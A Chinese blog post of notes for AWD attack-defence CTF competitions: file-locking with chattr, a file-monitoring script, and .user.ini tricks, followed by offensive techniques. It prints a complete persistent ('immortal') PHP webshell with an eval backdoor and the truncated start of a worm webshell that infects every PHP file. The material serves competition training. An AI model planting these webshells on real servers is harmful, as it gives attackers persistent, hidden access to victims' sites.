awd的那些事

最新推荐文章于 2024-05-05 21:51:56 发布
最新推荐文章于 2024-05-05 21:51:56 发布
阅读量788 收藏 14
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42346836/article/details/109114383
版权
本文介绍了多种Web防御措施,包括使用chattr命令保护文件不被删除,设置文件监控脚本,利用.user.ini文件进行PHP文件包含,以及探讨不死马维权、蠕虫webshell、大马等攻击手段。同时,提到了自动化删站脚本和提交flag的自动化脚本,以及利用软链接技巧。
摘要由CSDN通过智能技术生成

#防守
##常规步骤:备份,上waf
###利用chattr命令给文件上锁,防止被删站
chatter: 锁定文件,不能删除,不能更改
+a: 只能给文件添加内容,但是删除不了,
chattr +a /etc/passwd
-d: 不可删除
加锁:chattr +i /etc/passwd 文件不能删除,不能更改,不能移动
查看加锁: lsattr /etc/passwd 文件加了一个参数 i 表示锁定
解锁:chattr -i /home/omd/h.txt - 表示解除

##文件监控脚本

#!/usr/bin/python
#coding=utf-8
#作用:读取被修改过的文件,然后将文件的地址加上内容全部存放在txt

import sys,subprocess,os
#查找最近10分钟被修改的文件
def scanfile():
    #command: find -name '*.php' -mmin -10
    command = "find -name \'*.php\' -mmin -10"
    su = subprocess.Popen(command,shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
    STDOUT,STDERR = su.communicate()
    list = STDOUT.split("\n")
    #print str(list)
    #将文件处理成list类型然后返回。
    return list


#读取文件:
def loadfile(addr):
    data = ""
    #如果文件不存在就跳出函数
    try :
        file = open(addr,'r')
        data = file.read()
    except : 
        return 0
    all_data = addr+"\n"+data+"\n\n"
    file1 = open("shell.txt",'a+')
    #避免重复写入
    try:
        shell_content = file1.read()
    except:
        shell_content = "null"
    #如果文件内容不为空再写入,避免写入空的。
    #print shell_content
    if data :
        if all_data not in shell_content:
            file1.write(all_data)
    file.close()
    file1.close()
    rm_cmd = "rm -rf "+addr
    su = subprocess.Popen(rm_cmd,shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
    su.communicate()
    print "loadfile over : "+addr


if __name__ == '__main__':
    while True:


        list = scanfile()
        if list :
            for i in range(len(list)):
                #如果list[i]为空就不读取了
                if list[i]:
                    loadfile(str(list[i]))
        else : pass

##利用.user.ini配置文件使所有的php文件包含指定文件
###常规操作:使所以php文件都包含waf

auto_prepend_file=waf.php//具体路径和根据实际情况自行改写

###Sao操作:
分别创建两个php文件一个命名为6.php一个为2.jpg

//6.php
<?php
echo '66666' 
?>

//2.jpg
<?php
if(@$_GET['shell']=='test'){
   
       phpinfo();
    }
?>

创建.user.ini配置文件
auto_prepend_file=2.jpg
访问6.php http://127.0.0.1/1/6.php在这里插入图片描述

url后加上?shell=test后访问在这里插入图片描述

php语句被成功执行
具体用来做什么就看你自己的脑洞了

攻击
常规操作:不死马维权

<?php 
ignore_user_abort(true);
set_time_limit(0);
unlink(__FILE__);
$file = '.logout.php';
$code = '<?php if(md5($_GET["pass"])=="21232f297a57a5a743894a0e4a801fc3"){eval($_POST["a"]);} ?>';
while (1){
   
	file_put_contents($file,$code);
	usleep(8);
}
?>

激活不死马:访问 不死马地址?pass=admin (ps:21232f297a57a5a743894a0e4a801fc3是admin的md5值)
不死马使用:激活后会每隔8秒生成一个.logout.php文件,这是个md5加密的马(如果有文件包含可以生成其他格式的马,利用文件包含将其解析成php)。利用蚁剑连接,地址:不死马地址?pass=admin 密码a
恶心的操作:蠕虫webshell实现批量挂马
蠕虫webshell是实行批量挂马的操作,利用此webshell可以在所有php文件中加上shell语句的包括phpmyadmin文件,可能唯一的解决方法就是删站
shell文件:

<?php
$tips = 'AWD_Light_Check';
//这个是后面检查的是否感染头,如果没有,就会重写这个php
error_reporting(0);
$Serv_Num = 159;
//这个变量是要写入其他文件头部的本页行数,因为感染了其他php要互相感染,不能把其他原有php代码写入到其他php,会乱套。
$arr_dir = array();
//全局变量,扫到的文件夹
$files = array();
//全局变量,扫到的文件
if (!function_exists('Url_Check')) {
   
	function Url_Check() {
   
		$pageURL = 'http';
		if ($_SERVER["HTTPS"] == "on") {
   
			$pageURL .= "s";
		}
		$pageURL .= '://';
		$pageURL .= $_SERVER["SERVER_NAME"] . ":" . $_SERVER["SERVER_PORT"];
		return $pageURL;
	}
	function file_check($dir) {
   
		//扫描文件夹
		global $arr_dir;
		global $files;
		if (is_dir($dir)
最低0.47元/天 解锁文章
Fuckxx
关注
CTF线下赛AWD脚本合集
08-25
本人在长城杯、蓝桥杯、巅峰极客等线下AWD攻防比赛所用到的全部工具(如WAF、EDR、文件监控脚本、文件还原脚本、混淆战局工具、流量监控工具、批量拿分脚本模板)和脚本以及教程及笔记还有练习平台和靶场源码,并...
基于AWD比赛的蠕虫webshell
蚁景网安学院
10-16 849
0x00 蠕虫webshell不死马大家可能听得比较多,但蠕虫webshell大家可能还没有听过,因为是我为了awd比赛量身定制的一个webshell。蠕虫webshell之所以叫蠕虫w...
webshell 检查python_GitHub - haoirui/findWebshell: findWebshell是一款基于python开发的webshell检查工具,可以检查任意类型的web...
weixin_34277051的博客
01-14 189
##工具简介findWebshell是一款基于python开发的webshell检查工具,可以检查任意类型的webshell后门。##使用说明Usage: main.py [options]Options:-h, --help show this help message and exit-p PATH, --path=PATH input web directory fi...
CTF/AWD竞赛标准参考书+实战指南:《AWD特训营》
莫等闲 白了少年头 空悲切
10-13 3125
随着网络安全问题日益凸显,国家对网络安全人才的需求持续增长,其中,网络安全竞赛在国家以及企业的人才培养和选拔中扮演着至关重要的角色。一是最大限度减少攻击者的入侵时间,尽可能让其丧失对目标的访问,或者令其攻击成功后的停留时间最短;二是最大限度降低攻击者入侵成功后的横向移动速度,限制其在网络上的横向移动;三是以最快的速度清理后门,防止其重新进入网络资产;四是尽可能提高攻击溯源速度,掌握攻击者的动机和手法。
第一次玩AWD总结
qq_33319299的博客
07-23 3668
第一次玩AWD总结 第一次玩AWD,全靠大佬带,自己就像流水线工人样,一直提交大佬发的 flag
鱼哥赠书活动第②期:《AWD特训营:技术解析、赛题实战与竞赛技巧》《ATT&CK视角下的红蓝对抗实战指南》《智能汽车网络安全权威指南》上下册
热门推荐
Aluxian_的博客
10-12 1万+
这是一本能指导你在AWD竞赛中速胜的标准参考书,也是一本能让你在高段位的CTF竞赛技高一筹的攻防秘籍,还是一本能全面提升你的网络安全攻防技术与水平的实战指南。本书兼顾攻击与防守的双重视角,围绕AWD竞赛的内容全面展开,包括安全工具、主机安全加固、网络攻击、入侵检测、权限维持、应急响应、自动化攻防等技术主题。不仅剖析了AWD竞赛背后的技术细节,还总结了AWD竞赛的战略和战术。书中精选了大量真实案例和赛题,详细讲解了解题的方法和经验。
自制AWD工具包.rar
03-05
【自制AWD工具包】是一个专门针对AWD(Adaptive Website Design)技术的自定义工具集合,它旨在帮助开发者和设计师更好地实现响应式网页设计。响应式网页设计是一种现代网页设计方法,允许网站在不同设备上(如桌面...
CTF AWD工具
10-07
AWD(Attack-Defence)是CTF的一种类型,它侧重于实战模拟,让参赛者同时进行攻击与防御。本压缩包汇集了一系列的CTF AWD工具,这些工具对于学习和提升网络安全技术非常有帮助。 首先,"Seay源代码审计系统.exe" 是...
AWD之赛前培训.pptx
02-07
AWD比赛详解】 AWD(Attack With Defense)是一种网络安全竞赛模式,要求参赛者同时扮演攻击和防守的角色,旨在提升选手的攻防能力和团队协作能力。在这个模式中,选手需要在保护自己的系统(称为GameBox)免受...
AWD自动提交flag脚本
05-14
AWD自动提交flag脚本】是用于网络安全竞赛(如Capture The Flag,简称CTF)中的自动化工具,特别是在 Automated Web Defense(AWD)类型的比赛中。这类脚本的主要目的是提高效率,减少手动操作,使得参赛者能够...
AWD的那些
战神/calmness的博客
12-23 4914
介绍 AWD全称 Attack With Defence 总之就是你既是 hacker 又是 manager ;目标就是拿到其他战队靶机的shell 即可,通过shell 访问 flag服务器,得到flag后提交得分; 攻击-发现漏洞 防御-修复漏洞 比赛形式与规则 服务器主要是包括WEB靶机和PWN靶机,服务器基本上为linux系统在系统某处存在flag或者执行某条命令获取flag flag 定时刷新,每隔一段时间会生成新的flag,攻击者可以提交新的flag 来得分,但不可重复提交相同的...
基于AWD比赛的蠕虫webshell(二)
蚁景网安学院
10-18 588
0x00 python维持复活框架一个蠕虫webshell只是相当于一枚好的子弹,我们还需要配置一把枪来搭配使用,那么如何做到我们落地98k,别人落地还要慢慢捡枪才能吃鸡呢。上篇只是的简...
webshell 检查python_基于AWD比赛的蠕虫webshell
weixin_39560245的博客
01-09 162
0x00 蠕虫webshell不死马大家可能听得比较多,但蠕虫webshell大家可能还没有听过,因为是我为了awd比赛量身定制的一个webshell。蠕虫webshell之所以叫蠕虫webshell,是因为它可以把本地的php会写shell插入到其他php原文件,还增加了相互复活机制,后期增加与其他已感染的主机中的webshell互相复活。先给大家看看这个蠕虫webshell已经实现的...
扫描网站后门脚本(awd可用)
qq_44657899的博客
09-14 1510
awd线下赛的时候,可以用这个脚本来检测有没有一句话木马 脚本如下: <!DOCTYPE html> <html> <head> <meta charset='gb2312'> <title>PHP web shell scan</title> </head> <body> </body> <?php define("SELF",php_self());
Web AWD流程与技巧
kukudeshuo的博客
07-11 2154
AWD简单介绍
海河工匠杯决赛
Monica的博客
11-08 959
一道字符串减少的反序列化题目,以前没有遇到过,结果在这里被制裁了,复现一下。增加姿势 注意吞掉这个词 题目 <?php @include 'common_ui.inc';?> <?php class Low{ public $user1; public $user2; function __construct($a, $b){ $this->user1 = $a; $this->user2 = $b; }
【教程】AWD中如何通过Python批量快速管理服务器?
zxsctf的博客
08-04 398
很多同学都知道,我们常见的CTF赛除了解题赛之外,还有一种赛制叫AWD赛制。在这种赛制下,我们战队会拿到一个或多个服务器。服务器的连接方式通常是SSH链接,并且可能一个战队可能会同时有多个服务器。本期文章,我们来详细讲述一下如何使用Python绝地反击、逆风翻盘。
红蓝对抗-AWD全流程攻略07(Python脚本编写)
最新发布
m0_67189356的博客
05-05 1215
AWD中编写python脚本相关的基础知识
BugkuCTF-WEB题前女友
am_03的博客
08-29 478
解题流程 0、打开网页 发现其内有一个链接 1、点击链接,查看PHP源代码 <?php if(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){ // 检测以GET方式传入的三个参数 v1、v2、v3 $v1 = $_GET['v1']; // 变量v1等于传入的参数v1 $v2 = $_GET['v2']; // 变量v2等于传入的参数v2 $v3 = $_GET
AWD攻防系统框架有那些
03-25
常见的AWD攻防系统框架包括以下几种: 1. FBCTF:一个基于CTF比赛的AWD攻防系统,在网络分布式安全测试中广泛使用。 2. iCTF:一个开源的CTF比赛管理平台和AWD攻防系统,支持多个团队同时进行攻击和防御。 3. ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值